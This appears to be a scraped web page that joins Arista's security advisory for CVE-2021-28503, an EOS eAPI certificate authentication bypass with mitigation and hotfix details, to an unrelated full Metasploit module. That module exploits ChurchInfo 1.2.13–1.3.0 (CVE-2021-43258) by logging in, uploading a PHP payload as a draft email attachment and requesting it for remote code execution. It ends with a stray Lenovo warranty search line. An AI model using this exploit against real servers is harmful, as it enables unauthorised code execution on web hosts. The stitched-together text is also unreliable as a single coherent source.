****Date: February** 2nd, 2022******Version:** 1.0**

Revision

Date

Changes

1.0

February 2nd, 2022

Initial Release

The CVE-ID tracking this issue: CVE-2021-28503  
CVSSv3.1 Base Score: 7.4( CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H)  
The internal bug tracking this issue: BUG606686

****Description****

This advisory documents the impact of an internally found vulnerability in Arista's EOS software.

The impact of this vulnerability is that eAPI may skip re-evaluating user credentials when certificate based authentication is used, which allows remote attackers to access the device via eAPI.

This issue was discovered internally and Arista is not aware of any malicious uses of this issue in customer networks.

**Vulnerability Assessment**

**Affected Software**

EOS Versions:

*   4.26.2 and below releases in the 4.26.x train
*   4.25.5 and below releases in the 4.25.x train
*   4.24.7 and below releases in the 4.24.x train
*   4.23.9 and below releases in the 4.23.x train
*   All releases in 4.22.x train

**Affected Platforms**

This is a platform-independent vulnerability and affects all systems running EOS (including CloudEOS and vEOS-lab) with the versions identified above.

The following products are **not** affected:

*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   CloudVision Portal, virtual appliance or physical appliance
*   CloudVision as-a-Service
*   Arista 7130 Systems running MOS
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Awake Security Platform

****Required Configuration for Exploitation****

EAPI is enabled with user certificate authentication configuration.

management security
   ssl profile profileEAPI
      certificate httpServer.cert key httpServer.key
      trust certificate user.cert
      trust certificate ca.cert

management api http-commands
   protocol https ssl profile profileEAPI
   no shutdown

****Indicators of Compromise****

Unexpected login activities from certificate based authentication username can be used to indicate the exploitation of this vulnerability.

**Check accounting logs on AAA server**

If EXEC accounting is configured, the accounting logs on AAA server for multiple logins at the same time by the same certificate based authentication username can be used to indicate the exploitation of this vulnerability.

**Check eAPI request activities on device**

The eAPI request activities submitted by the certificate based authentication username in the following show command can be used to indicate the exploitation of this vulnerability.

For example, a user certificate generated with username “alice” is configured to eAPI SSL profile, then check the request count number and last request time of user “alice” to make sure the output is expected.

switch#show management api http-commands
Enabled:            Yes
HTTPS server:       running, set to use port 443
HTTP server:        shutdown, set to use port 80
Local HTTP server:  shutdown, no authentication, set to use port 8080
Unix Socket server: shutdown, no authentication
VRFs:               default
Hits:               39
Last hit:           493 seconds ago
Bytes in:           38477
Bytes out:          13750
Requests:           38
Commands:           186
Duration:           94.179 seconds
SSL Profile:        profileEAPI, valid
FIPS Mode:          No
QoS DSCP:           0
Log Level:          none
CSP Frame Ancestor: None
TLS Protocols:      1.0 1.1 1.2
   User        Requests       Bytes in       Bytes out    Last hit
----------- -------------- -------------- --------------- ---------------
   admin       29             36991          8308         493 seconds ago
   alice       9              1486           5442         497 seconds ago

URLs
--------------------------------------- 
Management1 : https://:443

****Mitigation****

The following configuration changes may be made in order to mitigate the exploitation of the listed vulnerability.

Disallowing user certificate authentication via eAPI can be used to mitigate the vulnerability.

switch(config)#management security
switch(config-mgmt-security)#ssl profile profileEAPI
switch(config-mgmt-sec-ssl-profile-profileEAPI)#no trust certificate user.cert
switch(config-mgmt-sec-ssl-profile-profileEAPI)#exit

****Resolution****

The recommended resolution is to upgrade to a remediated software version at your earliest convenience.

The vulnerability is fixed in the following EOS versions:

*   4.26.3 and later releases in the 4.26.x train
*   4.25.6 and later releases in the 4.25.x train
*   4.24.8 and later releases in the 4.24.x train
*   4.23.10 and later releases in the 4.24.x train

For an immediate remediation until EOS can be upgraded, the following hotfixes are available.

**Hotfix**

The hotfix can be installed as an EOS extension and is applicable across all affected EOS versions. The hotfix SWIX installation is hitless with CapiApp agent being restarted.

*   Hotfix SWIX URL: SecurityAdvisoryShastaHotfix.swix
*   Hotfix SWIX hash: (SHA-512)d4f5221f8d5f3cceb74a61e733c570f326a5ade4d845f58929bd0902932218d8c9  
    065675198c515cc194bcb2eaa8bc23ffe7136e91eedf478d23a1a0154138f9

For instructions on installation and verification of the hotfix patch, refer to the “managing eos extensions” section in the EOS User Manual. Ensure that the patch is made persistent across reboots by running the command ‘_copy installed-extensions boot-extensions_’.

****For More Information****

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

****Open a Service Request:****

By email: This email address is being protected from spambots. You need JavaScript enabled to view it.

By telephone: 408-547-5502 ; 866-476-0000

CVE-2021-28503: Security Advisory 0072 - Arista

This Metasploit module exploits the logic in the CartView.php page when crafting a draft email with an attachment. By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and then browsing to the location of the uploaded PHP file on the web server, arbitrary code execution as the web daemon user (e.g. www-data) can be achieved.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ChurchInfo 1.2.13-1.3.0 Authenticated RCE',        'Description' => %q{          This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and          then browsing to the location of the uploaded PHP file on the web server, arbitrary code          execution as the web daemon user (e.g. www-data) can be achieved.        },        'License' => MSF_LICENSE,        'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],        'References' => [          ['URL', 'http://www.churchdb.org/'],          ['URL', 'http://sourceforge.net/projects/churchinfo/'],          ['CVE', '2021-43258']        ],        'Platform' => 'php',        'Privileged' => false,        'Arch' => ARCH_PHP,        'Targets' => [['Automatic Targeting', { 'auto' => true }]],        'DisclosureDate' => '2021-10-30', # Reported to ChurchInfo developers on this date        'DefaultTarget' => 0,        'Notes' => {          'Stability' => ['CRASH_SAFE'],          'Reliability' => ['REPEATABLE_SESSION'],          'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']        }      )    )    # Set the email subject and message if interested    register_options(      [        Opt::RPORT(80),        OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),        OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),        OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']),        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!'])      ]    )  end  def check    if datastore['SSL'] == true      proto_var = 'https'    else      proto_var = 'http'    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'Default.php'),      'method' => 'GET',      'vars_get' => {        'Proto' => proto_var,        'Path' => target_uri.path      }    )    unless res      return CheckCode::Unknown('Target did not respond to a request to its login page!')    end    # Check if page title is the one that ChurchInfo uses for its login page.    if res.body.match(%r{<title>ChurchInfo: Login</title>})      print_good('Target is ChurchInfo!')    else      return CheckCode::Safe('Target is not running ChurchInfo!')    end    # Check what version the target is running using the upgrade pages.    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_14To1_3_0.php'),      'method' => 'GET'    )    if res && (res.code == 500 || res.code == 200)      return CheckCode::Vulnerable('Target is running ChurchInfo 1.3.0!')    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_13To1_2_14.php'),      'method' => 'GET'    )    if res && (res.code == 500 || res.code == 200)      return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.14!')    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_12To1_2_13.php'),      'method' => 'GET'    )    if res && (res.code == 500 || res.code == 200)      return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.13!')    else      return CheckCode::Safe('Target is not running a vulnerable version of ChurchInfo!')    end  end  #  # The exploit method attempts a login, adds items to the cart, then creates the email attachment.  # Adding items to the cart is required for the server-side code to accept the upload.  #  def exploit    # Need to grab the PHP session cookie value first to pass to application    vprint_status('Gathering PHP session cookie')    if datastore['SSL'] == true      vprint_status('SSL is true, changing protocol to HTTPS')      proto_var = 'https'    else      vprint_status('SSL is false, leaving protocol as HTTP')      proto_var = 'http'    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'Default.php'),      'method' => 'GET',      'vars_get' => {        'Proto' => proto_var,        'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI']      },      'keep_cookies' => true    )    # Ensure we get a 200 from the application login page    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})")    end    # Check that we actually are targeting a ChurchInfo server.    unless res.body.match(%r{<title>ChurchInfo: Login</title>})      fail_with(Failure::NotVulnerable, 'Target is not a ChurchInfo!')    end    # Grab our assigned session cookie    cookie = res.get_cookies    vprint_good("PHP session cookie is #{cookie}")    vprint_status('Attempting login')    # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'Default.php'),      'method' => 'POST',      'vars_post' => {        'User' => datastore['USERNAME'],        'Password' => datastore['PASSWORD'],        'sURLPath' => datastore['TARGETURI']      }    )    # A valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.    unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php'      fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")    end    vprint_good("Location header is #{res.headers['Location']}")    print_good("Logged into application as #{datastore['USERNAME']}")    vprint_status('Attempting exploit')    # We must add items to the cart before we can send the emails. This is a hard requirement server-side.    print_status('Navigating to add items to cart')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'SelectList.php'),      'method' => 'GET',      'vars_get' => {        'mode' => 'person',        'AddAllToCart' => 'Add+to+Cart'      }    )    # Need to check that items were successfully added to the cart    # Here we're looking through html for the version string, similar to:    # Items in Cart: 2    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP GET request to SelectList.php (response code: #{res.code})")    end    cart_items = res.body.match(/Items in Cart: (?<cart>\d)/)    unless cart_items      fail_with(Failure::UnexpectedReply, "#{peer} - Server did not respond with the text 'Items in Cart'. Is this a ChurchInfo server?")    end    if cart_items['cart'].to_i < 1      print_error('No items in cart detected')      fail_with(Failure::UnexpectedReply,                'Failure to add items to cart, no items were detected. Check if there are person entries in the application')    end    print_good("Items in Cart: #{cart_items}")    # Uploading exploit as temporary email attachment    print_good('Uploading exploit via temp email attachment')    payload_name = Rex::Text.rand_text_alphanumeric(5..14) + '.php'    vprint_status("Payload name is #{payload_name}")    # Create the POST payload with required parameters to be parsed by the server    post_data = Rex::MIME::Message.new    post_data.add_part(payload.encoded, 'application/octet-stream', nil,                       "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")    post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')    post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')    post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')    file = post_data.to_s    file.strip!    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'CartView.php'),      'method' => 'POST',      'data' => file,      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"    )    # Ensure that we get a 200 and the intended payload was    # successfully uploaded and attached to the draft email.    unless res.code == 200 && res.body.include?("Attach file:</b> #{payload_name}")      fail_with(Failure::Unknown, 'Failed to upload the payload.')    end    print_good("Exploit uploaded to #{target_uri.path + 'tmp_attach/' + payload_name}")    # Have our payload deleted after we exploit    register_file_for_cleanup(payload_name)    # Make a GET request to the PHP file that was uploaded to execute it on the target server.    print_good('Executing payload with GET request')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'tmp_attach', payload_name),      'method' => 'GET'    )  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  endend

Search

lenovo warranty check/lookup | check warranty status | lenovo support us